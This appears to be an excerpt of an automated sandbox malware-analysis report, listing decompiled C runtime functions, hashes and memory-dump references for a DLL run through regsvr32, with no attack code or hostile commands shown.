                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                    • API String ID: 851805269-3733052814
                                                                                                                                                                                                                    • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                                                                                                                                    • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 30%
                                                                                                                                                                                                                    			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                                    				intOrPtr _t103;
                                                                                                                                                                                                                    				void* _t113;
                                                                                                                                                                                                                    				void* _t118;
                                                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                                                    				long long _t133;
                                                                                                                                                                                                                    				intOrPtr* _t135;
                                                                                                                                                                                                                    				signed long long _t144;
                                                                                                                                                                                                                    				void* _t150;
                                                                                                                                                                                                                    				signed long long _t154;
                                                                                                                                                                                                                    				void* _t156;
                                                                                                                                                                                                                    				long long _t158;
                                                                                                                                                                                                                    				intOrPtr* _t159;
                                                                                                                                                                                                                    				void* _t161;
                                                                                                                                                                                                                    				void* _t162;
                                                                                                                                                                                                                    				signed long long _t166;
                                                                                                                                                                                                                    				void* _t170;
                                                                                                                                                                                                                    				intOrPtr _t171;
                                                                                                                                                                                                                    				void* _t173;
                                                                                                                                                                                                                    				void* _t174;
                                                                                                                                                                                                                    				void* _t176;
                                                                                                                                                                                                                    				void* _t178;
                                                                                                                                                                                                                    				void* _t180;
                                                                                                                                                                                                                    				intOrPtr* _t181;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t130 = __rax;
                                                                                                                                                                                                                    				 *((long long*)(_t161 + 8)) = __rbx;
                                                                                                                                                                                                                    				 *((long long*)(_t161 + 0x10)) = _t158;
                                                                                                                                                                                                                    				 *((long long*)(_t161 + 0x18)) = __rsi;
                                                                                                                                                                                                                    				_t162 = _t161 - 0x40;
                                                                                                                                                                                                                    				_t159 = __rcx;
                                                                                                                                                                                                                    				_t181 = __r9;
                                                                                                                                                                                                                    				_t174 = __rdx;
                                                                                                                                                                                                                    				E00000001180004584(_t76, __r8);
                                                                                                                                                                                                                    				_t171 =  *((intOrPtr*)(__r9 + 8));
                                                                                                                                                                                                                    				_t135 =  *((intOrPtr*)(__r9 + 0x38));
                                                                                                                                                                                                                    				_t178 =  *__r9 - _t171;
                                                                                                                                                                                                                    				_t103 =  *((intOrPtr*)(__r9 + 0x48));
                                                                                                                                                                                                                    				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
                                                                                                                                                                                                                    				 *((long long*)(_t162 + 0x30)) = __rcx;
                                                                                                                                                                                                                    				 *((long long*)(_t162 + 0x38)) = __r8;
                                                                                                                                                                                                                    				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
                                                                                                                                                                                                                    				_t154 = __r8 + __r8;
                                                                                                                                                                                                                    				if (_t178 - _t130 < 0) goto 0x80002b9e;
                                                                                                                                                                                                                    				if (_t178 - _t130 >= 0) goto 0x80002b9e;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
                                                                                                                                                                                                                    				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
                                                                                                                                                                                                                    				if (_t113 < 0) goto 0x80002ba5;
                                                                                                                                                                                                                    				if (_t113 <= 0) goto 0x80002b9e;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
                                                                                                                                                                                                                    				if ( *0x800164f8 == 0) goto 0x80002b5b;
                                                                                                                                                                                                                    				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
                                                                                                                                                                                                                    				_t83 =  *0x800164f8();
                                                                                                                                                                                                                    				r8d = 1;
                                                                                                                                                                                                                    				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
                                                                                                                                                                                                                    				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
                                                                                                                                                                                                                    				r9d =  *_t159;
                                                                                                                                                                                                                    				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
                                                                                                                                                                                                                    				_t133 =  *((intOrPtr*)(_t181 + 0x28));
                                                                                                                                                                                                                    				 *((long long*)(_t162 + 0x20)) = _t133;
                                                                                                                                                                                                                    				__imp__RtlUnwindEx();
                                                                                                                                                                                                                    				E00000001180004580(_t84);
                                                                                                                                                                                                                    				goto 0x80002ada;
                                                                                                                                                                                                                    				goto 0x80002c5d;
                                                                                                                                                                                                                    				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
                                                                                                                                                                                                                    				goto 0x80002c4e;
                                                                                                                                                                                                                    				_t144 = _t174 + _t174;
                                                                                                                                                                                                                    				if (_t178 - _t133 < 0) goto 0x80002c4c;
                                                                                                                                                                                                                    				_t118 = _t178 - _t133;
                                                                                                                                                                                                                    				if (_t118 >= 0) goto 0x80002c4c;
                                                                                                                                                                                                                    				r10d =  *(_t159 + 4);
                                                                                                                                                                                                                    				r10d = r10d & 0x00000020;
                                                                                                                                                                                                                    				if (_t118 == 0) goto 0x80002c21;
                                                                                                                                                                                                                    				r9d = 0;
                                                                                                                                                                                                                    				if (_t101 == 0) goto 0x80002c1c;
                                                                                                                                                                                                                    				r8d = r9d;
                                                                                                                                                                                                                    				_t166 = _t159 + _t159;
                                                                                                                                                                                                                    				if (_t156 - _t133 < 0) goto 0x80002c14;
                                                                                                                                                                                                                    				if (_t156 - _t133 >= 0) goto 0x80002c14;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
                                                                                                                                                                                                                    				r9d = r9d + 1;
                                                                                                                                                                                                                    				if (r9d - _t101 < 0) goto 0x80002be4;
                                                                                                                                                                                                                    				if (r9d != _t101) goto 0x80002c58;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
                                                                                                                                                                                                                    				if (_t156 != _t133) goto 0x80002c4c;
                                                                                                                                                                                                                    				if (r10d != 0) goto 0x80002c58;
                                                                                                                                                                                                                    				goto 0x80002c4c;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
                                                                                                                                                                                                                    				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
                                                                                                                                                                                                                    				 *((long long*)(_t166 + _t171))();
                                                                                                                                                                                                                    				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                    0x180002a84
                                                                                                                                                                                                                    0x180002a84
                                                                                                                                                                                                                    0x180002a89
                                                                                                                                                                                                                    0x180002a8e
                                                                                                                                                                                                                    0x180002a9c
                                                                                                                                                                                                                    0x180002aa0
                                                                                                                                                                                                                    0x180002aa3
                                                                                                                                                                                                                    0x180002aac
                                                                                                                                                                                                                    0x180002aaf
                                                                                                                                                                                                                    0x180002ab4
                                                                                                                                                                                                                    0x180002abb
                                                                                                                                                                                                                    0x180002abf
                                                                                                                                                                                                                    0x180002ac6
                                                                                                                                                                                                                    0x180002aca
                                                                                                                                                                                                                    0x180002ad0
                                                                                                                                                                                                                    0x180002ad5
                                                                                                                                                                                                                    0x180002adc
                                                                                                                                                                                                                    0x180002ae4
                                                                                                                                                                                                                    0x180002aee
                                                                                                                                                                                                                    0x180002afb
                                                                                                                                                                                                                    0x180002b06
                                                                                                                                                                                                                    0x180002b11
                                                                                                                                                                                                                    0x180002b24
                                                                                                                                                                                                                    0x180002b26
                                                                                                                                                                                                                    0x180002b28
                                                                                                                                                                                                                    0x180002b31
                                                                                                                                                                                                                    0x180002b3b
                                                                                                                                                                                                                    0x180002b4b
                                                                                                                                                                                                                    0x180002b55
                                                                                                                                                                                                                    0x180002b5f
                                                                                                                                                                                                                    0x180002b6b
                                                                                                                                                                                                                    0x180002b77
                                                                                                                                                                                                                    0x180002b7e
                                                                                                                                                                                                                    0x180002b85
                                                                                                                                                                                                                    0x180002b8a
                                                                                                                                                                                                                    0x180002b8e
                                                                                                                                                                                                                    0x180002b93
                                                                                                                                                                                                                    0x180002b99
                                                                                                                                                                                                                    0x180002ba0
                                                                                                                                                                                                                    0x180002ba7
                                                                                                                                                                                                                    0x180002bb0
                                                                                                                                                                                                                    0x180002bb3
                                                                                                                                                                                                                    0x180002bba
                                                                                                                                                                                                                    0x180002bc4
                                                                                                                                                                                                                    0x180002bce
                                                                                                                                                                                                                    0x180002bd1
                                                                                                                                                                                                                    0x180002bd3
                                                                                                                                                                                                                    0x180002bd7
                                                                                                                                                                                                                    0x180002bdb
                                                                                                                                                                                                                    0x180002bdd
                                                                                                                                                                                                                    0x180002be2
                                                                                                                                                                                                                    0x180002be4
                                                                                                                                                                                                                    0x180002be7
                                                                                                                                                                                                                    0x180002bf2
                                                                                                                                                                                                                    0x180002bfc
                                                                                                                                                                                                                    0x180002c07
                                                                                                                                                                                                                    0x180002c12
                                                                                                                                                                                                                    0x180002c14
                                                                                                                                                                                                                    0x180002c1a
                                                                                                                                                                                                                    0x180002c1f
                                                                                                                                                                                                                    0x180002c27
                                                                                                                                                                                                                    0x180002c2c
                                                                                                                                                                                                                    0x180002c31
                                                                                                                                                                                                                    0x180002c33
                                                                                                                                                                                                                    0x180002c3b
                                                                                                                                                                                                                    0x180002c3f
                                                                                                                                                                                                                    0x180002c49
                                                                                                                                                                                                                    0x180002c52
                                                                                                                                                                                                                    0x180002c7a

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                    • String ID: csm$f
                                                                                                                                                                                                                    • API String ID: 2395640692-629598281
                                                                                                                                                                                                                    • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                                                                                                                                    • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                    • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                                                                                                                                    • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                    			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                                    				signed int _t30;
                                                                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                                    				signed int _t43;
                                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_a8 = __rbx;
                                                                                                                                                                                                                    				_a16 = __rsi;
                                                                                                                                                                                                                    				_t27 = __ecx & 0x0000001f;
                                                                                                                                                                                                                    				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
                                                                                                                                                                                                                    				if (sil >= 0) goto 0x8000782e;
                                                                                                                                                                                                                    				E0000000118000BC4C(_t27, _t51);
                                                                                                                                                                                                                    				_t28 = _t27 & 0xfffffff7;
                                                                                                                                                                                                                    				goto 0x80007885;
                                                                                                                                                                                                                    				_t42 = 0x00000004 & dil;
                                                                                                                                                                                                                    				if (_t42 == 0) goto 0x80007849;
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				if (_t42 >= 0) goto 0x80007849;
                                                                                                                                                                                                                    				E0000000118000BC4C(_t28, _t51);
                                                                                                                                                                                                                    				_t29 = _t28 & 0xfffffffb;
                                                                                                                                                                                                                    				goto 0x80007885;
                                                                                                                                                                                                                    				_t43 = dil & 0x00000001;
                                                                                                                                                                                                                    				if (_t43 == 0) goto 0x80007865;
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				if (_t43 >= 0) goto 0x80007865;
                                                                                                                                                                                                                    				E0000000118000BC4C(_t29, _t51);
                                                                                                                                                                                                                    				_t30 = _t29 & 0xfffffffe;
                                                                                                                                                                                                                    				goto 0x80007885;
                                                                                                                                                                                                                    				_t44 = dil & 0x00000002;
                                                                                                                                                                                                                    				if (_t44 == 0) goto 0x80007885;
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				if (_t44 >= 0) goto 0x80007885;
                                                                                                                                                                                                                    				if ((dil & 0x00000010) == 0) goto 0x80007882;
                                                                                                                                                                                                                    				E0000000118000BC4C(_t30, _t51);
                                                                                                                                                                                                                    				_t31 = _t30 & 0xfffffffd;
                                                                                                                                                                                                                    				_t46 = dil & 0x00000010;
                                                                                                                                                                                                                    				if (_t46 == 0) goto 0x8000789f;
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				if (_t46 >= 0) goto 0x8000789f;
                                                                                                                                                                                                                    				E0000000118000BC4C(_t31, _t51);
                                                                                                                                                                                                                    				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                    0x1800077fc
                                                                                                                                                                                                                    0x180007801
                                                                                                                                                                                                                    0x180007810
                                                                                                                                                                                                                    0x180007818
                                                                                                                                                                                                                    0x18000781d
                                                                                                                                                                                                                    0x180007824
                                                                                                                                                                                                                    0x180007829
                                                                                                                                                                                                                    0x18000782c
                                                                                                                                                                                                                    0x180007833
                                                                                                                                                                                                                    0x180007836
                                                                                                                                                                                                                    0x180007838
                                                                                                                                                                                                                    0x18000783d
                                                                                                                                                                                                                    0x18000783f
                                                                                                                                                                                                                    0x180007844
                                                                                                                                                                                                                    0x180007847
                                                                                                                                                                                                                    0x180007849
                                                                                                                                                                                                                    0x18000784d
                                                                                                                                                                                                                    0x18000784f
                                                                                                                                                                                                                    0x180007854
                                                                                                                                                                                                                    0x18000785b
                                                                                                                                                                                                                    0x180007860
                                                                                                                                                                                                                    0x180007863
                                                                                                                                                                                                                    0x180007865
                                                                                                                                                                                                                    0x180007869
                                                                                                                                                                                                                    0x18000786b
                                                                                                                                                                                                                    0x180007870
                                                                                                                                                                                                                    0x180007876
                                                                                                                                                                                                                    0x18000787d
                                                                                                                                                                                                                    0x180007882
                                                                                                                                                                                                                    0x180007885
                                                                                                                                                                                                                    0x180007889
                                                                                                                                                                                                                    0x18000788b
                                                                                                                                                                                                                    0x180007890
                                                                                                                                                                                                                    0x180007897
                                                                                                                                                                                                                    0x1800078b5

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                    • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                                                                                                                                    • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                    • Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                                                                                                                                    • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                    • Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                                                                                                                                    • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                    			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                    				void* _t52;
                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t27 = _t45;
                                                                                                                                                                                                                    				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                                                                                                                                                                                    				 *((long long*)(_t27 + 0x18)) = __r8;
                                                                                                                                                                                                                    				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                                                                                                                                                                                    				_t43 = _t27 - 0x3f;
                                                                                                                                                                                                                    				_t46 = _t45 - 0xc0;
                                                                                                                                                                                                                    				if ( *__rcx == 0x80000003) goto 0x800038a4;
                                                                                                                                                                                                                    				E00000001180002D40(_t27);
                                                                                                                                                                                                                    				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                                                                                                                                                                                    				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
                                                                                                                                                                                                                    				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                                                                                                                                                                                    				E00000001180002D40(_t27);
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
                                                                                                                                                                                                                    				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
                                                                                                                                                                                                                    				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                                                                                                                                                                                    				if ( *__rcx == 0xe0434352) goto 0x800038c3;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                                                                                                                                                                                    				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                                                                                                                                                                                    				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                                                                                                                                                                                    				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                                                                                                                                                                                    				if (_t19 == 0) goto 0x800038c3;
                                                                                                                                                                                                                    				return _t19;
                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                    0x180003800
                                                                                                                                                                                                                    0x180003803
                                                                                                                                                                                                                    0x180003807
                                                                                                                                                                                                                    0x18000380b
                                                                                                                                                                                                                    0x18000381a
                                                                                                                                                                                                                    0x18000381e
                                                                                                                                                                                                                    0x180003834
                                                                                                                                                                                                                    0x180003836
                                                                                                                                                                                                                    0x18000383b
                                                                                                                                                                                                                    0x180003848
                                                                                                                                                                                                                    0x18000384c
                                                                                                                                                                                                                    0x180003855
                                                                                                                                                                                                                    0x18000385e
                                                                                                                                                                                                                    0x180003867
                                                                                                                                                                                                                    0x180003870
                                                                                                                                                                                                                    0x180003874
                                                                                                                                                                                                                    0x180003884
                                                                                                                                                                                                                    0x18000388c
                                                                                                                                                                                                                    0x180003891
                                                                                                                                                                                                                    0x180003896
                                                                                                                                                                                                                    0x18000389b
                                                                                                                                                                                                                    0x1800038a2
                                                                                                                                                                                                                    0x1800038be

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                    • API String ID: 3544855599-2084237596
